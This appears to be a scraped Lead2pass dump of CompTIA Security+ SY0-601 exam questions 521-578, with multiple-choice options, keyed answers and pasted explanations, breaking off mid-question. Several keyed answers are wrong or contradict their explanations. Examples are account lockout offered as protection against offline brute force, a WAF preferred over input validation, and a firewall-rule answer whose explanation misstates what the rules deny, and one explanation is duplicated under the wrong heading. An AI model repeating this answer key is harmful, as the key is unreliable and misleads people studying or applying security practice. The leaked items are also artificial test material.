Answer: C
Explanation:
Digital evidence integrity is ensured by calculating MD5 and SHA1 hashes of the extracted
content and storing it in a report along with other details related to the drive. It also offers an
encryption feature to ensure the confidentiality of the digital evidence.
QUESTION 521
Law enforcement officials sent a company a notification that states electronically stored
information and paper documents cannot be destroyed.
Which of the following explains this process?
A.
B.
C.
D.
Data breach notification
Accountability
Legal hold
Chain of custody
Answer: C
QUESTION 522
Which of the following is a detective and deterrent control against physical intrusions?
A.
B.
C.
D.
A lock
An alarm
A fence
A sign
Answer: B
Explanation:
An alarm is a detective and deterrent control against physical intrusions. It detects an intrusion
and alerts the security personnel or authorities. It also deters intruders from attempting to intrude
because they know that their actions will be detected.
QUESTION 523
A systems analyst determines the source of a high number of connections to a web server that
were initiated by ten different IP addresses that belong to a network block in a specific country.
Which of the following techniques will the systems analyst MOST likely implement to address this
issue?
A.
B.
C.
D.
Content filter
SIEM
Firewall rules
DLP
Answer: C
QUESTION 524
A security analyst generated a file named host1.pcap and shared it with a team member who is
going to use it for further incident analysis.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
180
Which of the following tools will the other team member MOST likely use to open this file?
A.
B.
C.
D.
Autopsy
Memdump
FTK imager
Wireshark
Answer: D
Explanation:
Some common applications that can open .pcap files are Wireshark, WinDump, tcpdump, Packet
Square - Capedit and Ethereal.
QUESTION 525
Several universities are participating in a collaborative research project and need to share
compute and storage resources. Which of the following cloud deployment strategies would BEST
meet this need?
A.
B.
C.
D.
Community
Private
Public
Hybrid
Answer: A
Explanation:
Community cloud storage is a variation of the private cloud storage model, which offers cloud
solutions for specific businesses or communities. In this model, cloud storage providers offer their
cloud architecture, software and other development tools to meet the requirements of the
community. A community cloud in computing is a collaborative effort in which infrastructure is
shared between several organizations from a specific community with common concerns
(security, compliance, jurisdiction, etc.), whether managed internally or by a third-party and
hosted internally or externally.
QUESTION 526
A backdoor was detected on the containerized application environment. The investigation
detected that a zero-day vulnerability was introduced when the latest container image version
was downloaded from a public registry. Which of the following is the BEST solution to prevent this
type of incident from occurring again?
A. Enforce the use of a controlled trusted source of container images
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers
C. Define a vulnerability scan to assess container images before being introduced on the
environment
D. Create a dedicated VPC for the containerized environment
Answer: A
QUESTION 527
A cybersecurity administrator needs to allow mobile BYOD devices to access network resources.
As the devices are not enrolled to the domain and do not have policies applied to them, which of
the following are best practices for authentication and infrastructure security? (Choose two.)
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
181
A. Create a new network for the mobile devices and block the communication to the internal network
and servers
B. Use a captive portal for user authentication.
C. Authenticate users using OAuth for more resiliency
D. Implement SSO and allow communication to the internal network
E. Use the existing network and allow communication to the internal network and servers.
F. Use a new and updated RADIUS server to maintain the best solution
Answer: BC
QUESTION 528
A company recently suffered a breach in which an attacker was able to access the internal mail
servers and directly access several user inboxes. A large number of email messages were later
posted online. Which of the following would BEST prevent email contents from being released
should another breach occur?
A.
B.
C.
D.
Implement S/MIME to encrypt the emails at rest
Enable full disk encryption on the mail servers.
Use digital certificates when accessing email via the web
Configure web traffic to only use TLS-enabled channels
Answer: A
QUESTION 529
An organization wants to integrate its incident response processes into a workflow with
automated decision points and actions based on predefined playbooks. Which of the following
should the organization implement?
A.
B.
C.
D.
SIEM
SOAR
EDR
CASB
Answer: B
Explanation:
Why is SOAR used? To synchronize tools, accelerate response times, reduce alert fatigue, and
compensate for the skill shortage gap. To collaborate with other analysts during investigations. To
analyze workload, organize an analyst's tasks, and allow teams to respond using their own
processes.
EDR
The Endpoint Detection and Response Solutions (EDR) market is defined as solutions that record
and store endpoint-system-level behaviors, use various data analytics techniques to detect
suspicious system behavior, provide contextual information, block malicious activity, and provide
remediation suggestions to restore ...
QUESTION 530
As part of a company's ongoing SOC maturation process, the company wants to implement a
method to share cyberthreat intelligence data with outside security partners. Which of the
following will the company MOST likely implement?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
182
A.
B.
C.
D.
TAXII
TLP
TTP
STIX
Answer: A
Explanation:
A TAXII server is a client that exchanges standardized and anonymized cyber threat intelligence
among users. It works as a venue for sharing and collecting Indicators of compromise, which
have been anonymized to protect privacy.
QUESTION 531
A security analyst is concerned about critical vulnerabilities that have been detected on some
applications running inside containers. Which of the following is the BEST remediation strategy?
A.
B.
C.
D.
Update the base container image and redeploy the environment.
Include the containers in the regular patching schedule for servers
Patch each running container individually and test the application
Update the host in which the containers are running
Answer: C
Explanation:
A container image vulnerability is a security risk that is embedded inside a container image. While
vulnerable images themselves don't pose an active threat, if containers are created based on a
vulnerable image, the containers will introduce the vulnerability to a live environment.
QUESTION 532
A security analyst is investigating multiple hosts that are communicating to external IP addresses
during the hours of 2:00 a.m - 4:00 am. The malware has evaded detection by traditional antivirus
software. Which of the following types of malware is MOST likely infecting the hosts?
A.
B.
C.
D.
A RAT
Ransomware
Logic bomb
A worm
Answer: C
QUESTION 533
The Chief Information Security Officer (CISO) has decided to reorganize security staff to
concentrate on incident response and to outsource outbound Internet URL categorization and
filtering to an outside company. Additionally, the CISO would like this solution to provide the same
protections even when a company laptop or mobile device is away from a home office. Which of
the following should the CISO choose?
A.
B.
C.
D.
CASB
Next-generation SWG
NGFW
Web-application firewall
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
183
Answer: B
Explanation:
CASB
A Next Generation Secure Web Gateway (SWG) is a new cloud-native solution for protecting
enterprises from the growing volume of sophisticated cloud enabled threats and data risks. It is
the logical evolution of the traditional secure web gateway, also known as a web proxy or web
filter.
Next-Generation SWG
A Next Generation Secure Web Gateway (SWG) is a new cloud-native solution for protecting
enterprises from the growing volume of sophisticated cloud enabled threats and data risks. It is
the logical evolution of the traditional secure web gateway, also known as a web proxy or web
filter.
NGFW
A Next-Generation Firewall (NGFW) is a cyber security solution to protect network fronts with
capabilities that extend beyond traditional firewalls.
Web-application firewall
A WAF protects your web apps by filtering, monitoring, and blocking any malicious HTTP/S traffic
traveling to the web application, and prevents any unauthorized data from leaving the app. It does
this by adhering to a set of policies that help determine what traffic is malicious and what traffic is
safe.
QUESTION 534
A company wants to restrict emailing of PHI documents. The company is implementing a DLP
solution. In order to restrict PHI documents, which of the following should be performed FIRST?
A.
B.
C.
D.
Retention
Governance
Classification
Change management
Answer: C
Explanation:
Data has to be first classified for the DLP to know which data can leave the network and which
can't.
Category based on the value to the organization and the sensitivity of the information if it were to
be disclosed.
QUESTION 535
After a WiFi scan of a local office was conducted, an unknown wireless signal was identified
Upon investigation, an unknown Raspberry Pi device was found connected to an Ethernet port
using a single connection. Which of the following BEST describes the purpose of this device?
A.
B.
C.
D.
loT sensor
Evil twin
Rogue access point
On-path attack
Answer: C
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
184
QUESTION 536
A recent security audit revealed that a popular website with IP address 172.16.1.5 also has an
FTP service that employees were using to store sensitive corporate data. The organization's
outbound firewall processes rules top-down. Which of the following would permit HTTP and
HTTPS, while denying all other services for this host?
A. access-rule permit tcp destination 172.16.1.5 port 80
access-rule permit tcp destination 172.16.1.5 port 443
access-rule deny ip destination 172.16.1.5
B. access-rule permit tcp destination 172.16.1.5 port 22
access-rule permit tcp destination 172.16.1.5 port 443
access-rule deny tcp destination 172.16.1.5 port 80
C. access-rule permit tcp destination 172.16.1.5 port 21
access-rule permit tcp destination 172.16.1.5 port 80
access-rule deny ip destination 172.16.1.5
D. access-rule permit tcp destination 172.16.1.5 port 80
access-rule permit tcp destination 172.16.1.5 port 443
access-rule deny tcp destination 172.16.1.5 port 21
Answer: D
Explanation:
The firewall will process the rules top-down. The first rule will permit TCP traffic to destination port
80 and 443 on host 172.16.1.5. The second rule will deny TCP traffic to destination port 21 on
host 172.16.1.5. Any traffic that does not match either of these rules will be denied.
QUESTION 537
A financial institution would like to store its customer data in a cloud but still allow the data to be
accessed and manipulated while encrypted. Doing so would prevent the cloud service provider
from being able to decipher the data due to its sensitivity. The financial institution is not
concerned about computational overheads and slow speeds.
Which of the following cryptographic techniques would BEST meet the requirement?
A.
B.
C.
D.
Asymmetric
Symmetric
Homomorphic
Ephemeral
Answer: C
QUESTION 538
An organization's Chief Information Security Officer is creating a position that will be responsible
for implementing technical controls to protect data, including ensuring backups are properly
maintained. Which of the following roles would MOST likely include these responsibilities?
A.
B.
C.
D.
E.
Data protection officer
Data owner
Backup administrator
Data custodian
Internal auditor
Answer: D
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
185
A Data Custodian has administrative and/or operational responsibility over Institutional Data. In
many cases, there will be multiple Data Custodians. An enterprise application may have teams of
Data Custodians, each responsible for varying functions. A Data Custodian is responsible for the
following: Implementing appropriate physical and technical safeguards to protect the
confidentiality, integrity and availability of Institutional Data.
QUESTION 539
A website developer who is concerned about theft cf the company's user database warns to
protect weak passwords from offline brute-force attacks.
Which of the following be the BEST solution?
A.
B.
C.
D.
Lock accounts after five failed logons
Precompute passwords with rainbow tables
Use a key-stretching technique
Hash passwords with the MD5 algorithm
Answer: A
QUESTION 540
A user reports trouble using a corporate laptop. The laptop freezes and responds slowly when
writing documents and the mouse pointer occasional disappears.
The task list shows the following results
Which of the following is MOST likely the issue?
A.
B.
C.
D.
RAT
PUP
Spyware
Keylogger
Answer: A
QUESTION 541
Which of the following attacks MOST likely occurred on the user's internal network?
Name: Wikipedia.org
Address: 208.80.154.224
A.
B.
C.
D.
DNS poisoning
URL redirection
ARP poisoning
/etc/hosts poisoning
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
186
QUESTION 542
A company currently uses passwords for logging in to company-owned devices and wants to add
a second authentication factor. Per corporate policy, users are not allowed to have smartphones
at their desks. Which of the following would meet these requirements?
A.
B.
C.
D.
Smart card
PIN code
Knowledge-based question
Secret key
Answer: A
QUESTION 543
A dynamic application vulnerability scan identified code injection could be performed using a web
form. Which of the following will be BEST remediation to prevent this vulnerability?
A.
B.
C.
D.
Implement input validations
Deploy MFA
Utilize a WAF
Configure HIPS
Answer: C
Explanation:
A vulnerability is a flaw or weakness in a computer system's security procedures, internal
controls, design, or implementation that could be exploited to violate the system security policy.
Because a dynamic security vulnerability scan identified code injection via a web form, the best
remediation to prevent this vulnerability is to use a WAF.
A web application firewall (WAF) defends web applications against application layer attacks
including such cross-site scripting (XSS), SQL injection, and cookie poisoning.
App attacks are the leading cause of breaches because they provide access to your valuable
data.
QUESTION 544
Which of the following would be used to find the MOST common web-application vulnerabilities?
A.
B.
C.
D.
OWASP
MITRE ATTACK
Cyber Kill Chain
SDLC
Answer: A
Explanation:
OWASP is a non-profit organization that provides a comprehensive list of the most common web
application vulnerabilities and offers recommendations for addressing them. MITRE ATT&CK is a
framework for tracking and analyzing the tactics, techniques, and procedures used by attackers,
while Cyber Kill Chain is a methodology for identifying and disrupting an attacker's activities.
SDLC (Software Development Life Cycle) is a systematic approach to developing software.
QUESTION 545
The board of doctors at a company contracted with an insurance firm to limit the organization's
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
187
liability. Which of the following risk management practices does the BEST describe?
A.
B.
C.
D.
Transference
Avoidance
Mitigation
Acknowledgement
Answer: A
Explanation:
If something happens, the insurance company will assume responsibility (Transference).
QUESTION 546
Which of the following would be MOST effective to contain a rapidly attack that is affecting a large
number of organizations?
A.
B.
C.
D.
Machine learning
DNS sinkhole
Blocklist
Honeypot
Answer: B
Explanation:
A DNS sinkhole would be the most effective option to contain a rapidly spreading attack that is
affecting a large number of organizations. A DNS sinkhole is a type of security measure that
involves redirecting traffic from malicious domains to a controlled environment, such as a
"sinkhole" server. This can help to prevent the spread of the attack by blocking access to the
malicious domains and preventing users from inadvertently accessing them.
QUESTION 547
An analyst just discovered an ongoing attack on a host that is on the network. The analyst
observes the below taking place:
- The computer performance is slow
- Ads are appearing from various pop-up windows
- Operating system files are modified
- The computer is receiving AV alerts for execution of malicious
processes
Which of the following steps should the analyst consider FIRST?
A.
B.
C.
D.
Check to make sure the DLP solution is in the active state
Patch the host to prevent exploitation
Put the machine in containment
Update the AV solution on the host to stop the attack
Answer: C
QUESTION 548
Security analysts are conducting an investigation of an attack that occurred inside the
organization's network. An attacker was able to connect network traffic between workstation
throughout the network. The analysts review the following logs:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
188
The layer 2 address table has hundred of entries similar to the ones above.
Which of the following attacks has MOST likely occurred?
A.
B.
C.
D.
SQL injection
DNS spoofing
MAC flooding
ARP poisoning
Answer: C
Explanation:
MAC flooding is a cyber attack that overflows the MAC Table (Layer 2 Table) of switches by
sending out invalid MAC addresses.
When a MAC Address table is full, the switch is no longer able to save new addresses, so it will
enter into fail-open mode and begin broadcasting data (like a hub) to all ports. This will allow an
attacker to get data packets intended for another computer and be able to steal sensitive
information.
QUESTION 549
The chief compliance officer from a bank has approved a background check policy for all new
hires. Which of the following is the policy MOST likely protecting against?
A.
B.
C.
D.
Preventing any current employees' siblings from working at the bank to prevent nepotism
Hiring an employee who has been convicted of theft to adhere to industry compliance
Filtering applicants who have added false information to resumes so they appear better qualified
Ensuring no new hires have worked at other banks that may be trying to steal customer
information
Answer: B
Explanation:
Hiring an employee who has been convicted of theft to adhere to industry compliance - As this is
a compliance officer, they would likely need to be concerned with complying with industry
regulations regarding the employees they hire. For example, PCI DSS requires background
checks for employees handling credit card information.
Background checks generally only allow employers to view criminal and court records, so it could
be helpful for an employer to know if a candidate has a record for theft with a background check
when determining employment.
QUESTION 550
Which biometric error would allow an unauthorized user to access a system?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
189
A.
B.
C.
D.
False acceptance
False entrance
False rejection
False denial
Answer: A
Explanation:
False Acceptance - There are only two metrics that are used to determine the performance of
biometrics: FAR (False Acceptance Rate) & FRR (False Rejection Rate). False Acceptance Rate
is a metric for biometric performance that determines the number of instances where
unauthorized persons were incorrectly authorized. For this question, a biometric error would
mean that someone was authorized when they weren't supposed to be authorized.
QUESTION 551
Which of the following would produce the closet experience of responding to an actual incident
response scenario?
A.
B.
C.
D.
Lessons learned
Simulation
Walk-through
Tabletop
Answer: B
QUESTION 552
An organization is concerned about intellectual property theft by employee who leave the
organization. Which of the following will be organization MOST likely implement?
A.
B.
C.
D.
CBT
NDA
MOU
AUP
Answer: B
QUESTION 553
An organization maintains several environments in which patches are developed and tested
before deployed to an operation status. Which of the following is the environment in which
patches will be deployed just prior to being put into an operational status?
A.
B.
C.
D.
Development
Test
Production
Staging
Answer: D
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
190
The staging environment is an optional environment, but it is commonly used when an
organization has multiple production environments. After passing testing, the system moves into
staging, from where it can be deployed to the different production systems.
QUESTION 554
Which of the following control types would be BEST to use to identify violations and incidents?
A.
B.
C.
D.
E.
F.
Detective
Compensating
Deterrent
Corrective
Recovery
Preventive
Answer: A
QUESTION 555
A security manager runs Nessus scans of the network after every maintenance window. Which of
the following is the security manger MOST likely trying to accomplish?
A.
B.
C.
D.
Verifying that system patching has effectively removed knows vulnerabilities
Identifying assets on the network that may not exist on the network asset inventory
Validating the hosts do not have vulnerable ports exposed to the internet
Checking the status of the automated malware analysis that is being performed
Answer: A
QUESTION 556
A penetration tester gains access to the network by exploiting a vulnerability on a public-facing
web server. Which of the following techniques will the tester most likely perform NEXT?
A.
B.
C.
D.
Gather more information about the target through passive reconnaissance
Establish rules of engagement before proceeding
Create a user account to maintain persistence
Move laterally throughout the network to search for sensitive information
Answer: C
Explanation:
Creating a valid account for the pentester can maximize the value of a penetration test when time
is limited.
QUESTION 557
A news article states that a popular web browser deployed on all corporate PCs is vulnerable a
zero-day attack. Which of the following MOST concern the Chief Information Security Officer
about the information in the new article?
A. Insider threats have compromised this network
B. Web browsing is not functional for the entire network
C. Antivirus signatures are required to be updated immediately
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
191
D. No patches are available for the web browser
Answer: D
QUESTION 558
DDoS attacks are causing an overload on the cluster of cloud servers. A security architect is
researching alternatives to make the cloud environment respond to load fluctuation in a costeffective way. Which of the following options BEST fulfils the architect's requirements?
A.
B.
C.
D.
An orchestration solution that can adjust scalability of cloud assets
Use of multipath by adding more connections to cloud storage
Cloud assets replicated on geographically distributed regions
An on-site backup that is deployed and only used when the load increases
Answer: A
Explanation:
Scaling cloud infrastructures can experience lag during the periods of high activity, where other
assets have to either be added, or become active. This is the compromise for a cost-effective
solution that scales. The company could go for a system that is absolutely overkill on assets at all
times, in preparation for those brief peak moments. But this is expensive, and unlikely to be taken
by most companies. Only case you would want to use one of these is if you have a sensitive or
critical service that MUST remain online. Stock exchange servers, military servers, bank servers,
etc. come to mind for this criteria.
QUESTION 559
Administrators have allowed employee to access their company email from personal computers.
However, the administrators are concerned that these computes are another attach surface and
can result in user accounts being breached by foreign actors.
Which of the following actions would provide the MOST secure solution?
A. Enable an option in the administration center so accounts can be locked if they are accessed
from different geographical areas
B. Implement a 16-character minimum length and 30-day expiration password policy
C. Set up a global mail rule to disallow the forwarding of any company email to email addresses
outside the organization
D. Enforce a policy that allows employees to be able to access their email only while they are
connected to the internet via VPN
Answer: A
QUESTION 560
A security engineer needs to build a solution to satisfy regulatory requirements that state certain
critical servers must be accessed using MFA. However, the critical servers are older and are
unable to support the addition of MFA.
Which of the following will the engineer MOST likely use to achieve this objective?
A.
B.
C.
D.
A forward proxy
A stateful firewall
A jump server
A port tap
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
192
Answer: C
QUESTION 561
A security analyst wants to fingerprint a web server. Which of the following tools will the security
analyst MOST likely use to accomplish this task?
A.
B.
C.
D.
nmap -p1-65535 192.168.0.10
dig 192.168.0.10
curl --head http://192.168.0.10
ping 192.168.0.10
Answer: C
Explanation:
curl - Identify remote web server
Type the command as follows:
$ curl -I http://www.remote-server.com/
$ curl -I http://vivekgite.com/
Output:
HTTP/1.1 200 OK
Content-type: text/html
Content-Length: 0
Date: Mon, 28 Jan 2008 08:53:54 GMT
Server: lighttpd
QUESTION 562
Which of the following provides a catalog of security and privacy controls related to the United
States federal information systems?
A.
B.
C.
D.
GDPR
PCI DSS
ISO 27000
NIST 800-53
Answer: D
Explanation:
NIST Special Publication 800-53 provides a catalog of security and privacy controls for all U.S.
federal information systems except those related to national security. It is published by the
National Institute of Standards and Technology, which is a non-regulatory agency of the United
States Department of Commerce.
QUESTION 563
An information security policy stales that separation of duties is required for all highly sensitive
database changes that involve customers' financial data. Which of the following will this be BEST
to prevent?
A.
B.
C.
D.
Least privilege
An insider threat
A data breach
A change control violation
Answer: B
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
193
Explanation:
Separation of duties - is a means of establishing checks and balances against the possibility that
critical system or procedures can be compromised by insider threats. Duties and responsibilities
should be divided among individuals to prevent ethical conflicts or abuse of powers.
QUESTION 564
A security analyst receives an alert from the company's SIEM that anomalous activity is coming
from a local source IP address of 192.168.34.26. The Chief Information Security Officer asks the
analyst to block the originating source. Several days later another employee opens an internal
ticket stating that vulnerability scans are no longer being performed properly. The IP address the
employee provides is 192.168.34.26. Which of the following describes this type of alert?
A.
B.
C.
D.
True positive
True negative
False positive
False negative
Answer: C
Explanation:
True Positive: A legitimate attack which triggers to produce an alarm. You have a brute force
alert, and it triggers. You investigate the alert and find out that somebody was indeed trying to
break into one of your systems via brute force methods.
False Positive: An event signalling to produce an alarm when no attack has taken place. You
investigate another of these brute force alerts and find out that it was just some user who
mistyped their password a bunch of times, not a real attack.
False Negative: When no alarm is raised when an attack has taken place. Someone was trying to
break into your system, but they did so below the threshold of your brute force attack logic. For
example, you set your rule to look for ten failed login in a minute, and the attacker did only 9. The
attack occurred, but your control was unable to detect it.
True Negative: An event when no attack has taken place and no detection is made. No attack
occurred, and your rule didn’t make fire.
QUESTION 565
Hackers recently attacked a company's network and obtained several unfavorable pictures from
the Chief Executive Officer's workstation. The hackers are threatening to send the images to the
press if a ransom is not paid. Which of the following is impacted the MOST?
A.
B.
C.
D.
Identify theft
Data loss
Data exfiltration
Reputation
Answer: C
Explanation:
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data
transfer from a computer. It is also commonly called data extrusion or data exportation. Data
exfiltration is also considered a form of data theft.
QUESTION 566
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
194
A software company is analyzing a process that detects software vulnerabilities at the earliest
stage possible. The goal is to scan the source looking for unsecure practices and weaknesses
before the application is deployed in a runtime environment. Which of the following would BEST
assist the company with this objective?
A.
B.
C.
D.
Use fuzzing testing
Use a web vulnerability scanner
Use static code analysis
Use a penetration-testing OS
Answer: C
Explanation:
Fuzzing
Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid,
unexpected, or random data as inputs to a computer program. The program is then monitored for
exceptions such as crashes, failing built-in code assertions, or potential memory leaks.
Static program analysis
Static program analysis is the analysis of computer software performed without executing any
programs, in contrast with dynamic analysis, which is performed on programs during their
execution.
What is static code analysis?
Static code analysis is a method of debugging by examining source code before a program is run.
It's done by analyzing a set of code against a set (or multiple sets) of coding rules. ... This type of
analysis addresses weaknesses in source code that might lead to vulnerabilities.
Penetration test
A penetration test, colloquially known as a pen test or ethical hacking, is an authorized simulated
cyberattack on a computer system, performed to evaluate the security of the system; this is not to
be confused with a vulnerability assessment.
QUESTION 567
A company is providing security awareness training regarding the importance of not forwarding
social media messages from unverified sources. Which of the following risks would this training
help to prevent?
A.
B.
C.
D.
Hoaxes
SPIMs
Identity fraud
Credential harvesting
Answer: A
Explanation:
Hoax
A hoax is a falsehood deliberately fabricated to masquerade as the truth. It is distinguishable from
errors in observation or judgment, rumors, urban legends, pseudo sciences, and April Fools' Day
events that are passed along in good faith by believers or as jokes.
Identity theft
Identity theft occurs when someone uses another person's personal identifying information, like
their name, identifying number, or credit card number, without their permission, to commit fraud or
other crimes. The term identity theft was coined in 1964. Identity fraud (also known as identity
theft or crime) involves someone using another individual's personal information without consent,
often to obtain a benefit.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
195
Credential Harvesting
Credential Harvesting (or Account Harvesting) is the use of MITM attacks, DNS poisoning,
phishing, and other vectors to amass large numbers of credentials (username / password
combinations) for reuse.
QUESTION 568
A penetration tester was able to compromise an internal server and is now trying to pivot the
current session in a network lateral movement. Which of the following tools, if available on the
server, will provide the MOST useful information for the next assessment step?
A.
B.
C.
D.
Autopsy
Cuckoo
Memdump
Nmap
Answer: D
Explanation:
Memdump
A display or printout of all or selected contents of RAM. After a program abends (crashes), a
memory dump is taken in order to analyze the status of the program. The programmer looks into
the memory buffers to see which data items were being worked on at the time of failure.
Nmap
Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover hosts and
services on a computer network by sending packets and analyzing the responses. Nmap
provides a number of features for probing computer networks, including host discovery and
service and operating system detection.
QUESTION 569
A security analyst is responding to an alert from the SIEM. The alert states that malware was
discovered on a host and was not automatically deleted. Which of the following would be BEST
for the analyst to perform?
A.
B.
C.
D.
Add a deny-all rule to that host in the network ACL
Implement a network-wide scan for other instances of the malware.
Quarantine the host from other parts of the network
Revoke the client's network access certificates
Answer: B
Explanation:
What is Malware?
Malware, short for "malicious software," refers to any intrusive software developed by
cybercriminals (often called "hackers") to steal data and damage or destroy computers and
computer systems. Examples of common malware include viruses, worms, Trojan viruses,
spyware, adware, and ransomware. Recent malware attacks have exfiltrated data in mass
amounts.
How do I protect my network against malware?
Typically, businesses focus on preventative tools to stop breaches. By securing the perimeter,
businesses assume they are safe. Some advanced malware, however, will eventually make their
way into your network. As a result, it is crucial to deploy technologies that continually monitor and
detect malware that has evaded perimeter defenses. Sufficient advanced malware protection
requires multiple layers of safeguards along with high-level network visibility and intelligence.
How do I detect and respond to malware?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
196
Malware will inevitably penetrate your network. You must have defenses that provide significant
visibility and breach detection. In order to remove malware, you must be able to identify malicious
actors quickly. This requires constant network scanning. Once the threat is identified, you must
remove the malware from your network. Today's antivirus products are not enough to protect
against advanced cyber threats. Learn how to update your antivirus strategy.
QUESTION 570
Which of the following authentication methods sends out a unique password to be used within a
specific number of seconds?
A.
B.
C.
D.
TOTP
Biometrics
Kerberos
LDAP
Answer: A
QUESTION 571
Which of the following must be in place before implementing a BCP?
A.
B.
C.
D.
SLA
AUP
NDA
BIA
Answer: D
Explanation:
To create an effective business continuity plan, a firm should take these five steps:
Step 1: Risk Assessment
This phase includes:
Evaluation of the company's risks and exposures
Assessment of the potential impact of various business disruption scenarios Determination of the
most likely threat scenarios
Assessment of telecommunication recovery options and communication plans Prioritization of
findings and development of a roadmap Step 2: Business Impact Analysis (BIA)
During this phase we collect information on:
Recovery assumptions, including Recovery Point Objectives (RPO) and Recovery Time
Objectives (RTO)
Critical business processes and workflows as well as the supporting production applications
Interdependencies, both internal and external
Critical staff including backups, skill sets, primary and secondary contacts Future endeavors that
may impact recovery
Special circumstances
Pro tip: Compiling your BIA into a master list can be helpful from a wholistic standpoint, as well as
helpful in identifying pain points throughout the organization.
Step 3: Business Continuity Plan Development
This phase includes:
Obtaining executive sign-off of Business Impact Analysis Synthesizing the Risk Assessment and
BIA findings to create an actionable and thorough plan
Developing department, division and site level plans
Reviewing plan with key stakeholders to finalize and distribute Step 4: Strategy and Plan
Development
Validate that the recovery times that you have stated in your plan are obtainable and meet the
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
197
objectives that are stated in the BIA. They should easily be available and readily accessible to
staff, especially if and when a disaster were to happen. In the development phase, it's important
to incorporate many perspectives from various staff and all departments to help map the overall
company feel and organizational focus. Once the plan is developed, we recommend that you
have an executive or management team review and sign off on the overall plan.
Step 5: Plan Testing & Maintenance
The final critical element of a business continuity plan is to ensure that it is tested and maintained
on a regular basis. This includes:
Conducting periodic table top and simulation exercises to ensure key stakeholders are
comfortable with the plan steps
Executing bi-annual plan reviews
Performing annual Business Impact Assessments
QUESTION 572
A system that requires an operation availability of 99.99% and has an annual maintenance
window available to patching and fixes will require the HIGHEST:
A.
B.
C.
D.
MTBF
MTTR
RPO
RTO
Answer: A
QUESTION 573
A company reduced the area utilized in its datacenter by creating virtual networking through
automation and by creating provisioning routes and rules through scripting.
Which of the following does this example describe?
A.
B.
C.
D.
laC
MSSP
Containers
SaaS
Answer: A
Explanation:
Infrastructure as Code
Infrastructure as code is the process of managing and provisioning computer data centers
through machine-readable definition files, rather than physical hardware configuration or
interactive configuration tools.
QUESTION 574
As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a
previous incident is happening again. Which of the following would allow the security analyst to
alert the SOC if an event is reoccurring?
A.
B.
C.
D.
Creating a playbook within the SOAR
Implementing rules in the NGFW
Updating the DLP hash database
Publishing a new CRL with revoked certificates
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
198
Answer: A
QUESTION 575
An attacker browses a company's online job board attempting to find any relevant information
regarding the technologies the company uses. Which of the following BEST describes this social
engineering technique?
A.
B.
C.
D.
Hoax
Reconnaissance
Impersonation
Pretexting
Answer: B
QUESTION 576
A systems administrator is considering different backup solutions for the IT infrastructure. The
company is looking for a solution that offers the fastest recovery time while also saving the most
amount of storage used to maintain the backups. Which of the following recovery solutions would
be the BEST option to meet these requirements?
A.
B.
C.
D.
Snapshot
Differential
Full
Tape
Answer: B
Explanation:
There are mainly three types of backup: full, differential, and incremental.
Let's dive in to know more about the types of backup, the difference between them and which one
would be the best fit for your business.
Full Backup
A full backup is the most complete type of backup where you clone all the selected data. This
includes files, folders, SaaS applications, hard drives and more. The highlight of a full backup is
the minimal time it requires to restore data. However, since as everything is backed up in one go,
it takes longer to backup compared to other types of backup.
The other common issue with running full backups is that it overloads storage space. That's why
most businesses tend to run a full backup and occasionally follow it up with differential or
incremental backup. This reduces the burden on the storage space, increasing backup speed.
Differential Backup
A differential backup straddles the line between a full and an incremental backup. This type of
backup involves backing up data that was created or changed since the last full backup. To put it
simply, a full backup is done initially, and then subsequent backups are run to include all the
changes made to the files and folders.
It lets you restore data faster than full backup since it requires only two backup components: an
initial full backup and the latest differential backup.
Let's see how a differential backup works:
Day 1 ?Schedule a full backup
Day 2 ?Schedule a differential backup. It will cover all the changes that took place between Day 1
and Day 2
Day 3 ?Schedule a differential backup. It will make a copy of all the data that has changed from
Day 2 (this includes the full backup on Day 1 + differential backup) and Day 3.
Incremental Backup
The first backup in an incremental backup is a full backup. The succeeding backups will only
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
199
store changes that were made to the previous backup. Businesses have more flexibility in
spinning these types of backups as often as they want, with only the most recent changes stored.
Incremental backup requires space to store only the changes (increments), which allows for
lightning-fast backups.
Difference Between Full, Differential and Incremental Backups Full Differential Incremental
Storage Space High Medium to High Low
Backup Speed Slowest Fast Fastest
Restoration Speed Fastest Fast Slowest
Most recent full backup
Most recent full backup
Media Required for Most recent backup &all incremental &most recent
Recovery only backups since full
differential backup
backup
Stores a lot of duplicate
Duplication Stores duplicate files No duplicate files
files
QUESTION 577
An organization wants seamless authentication to its applications. Which of the following should
the organization employ to meet this requirement?
A.
B.
C.
D.
SOAP
SAML
SSO
Kerberos
Answer: C
QUESTION 578
A penetration tester successfully gained access to a company's network. The investigating
analyst determines malicious traffic connected through the WAP despite filtering rules being in
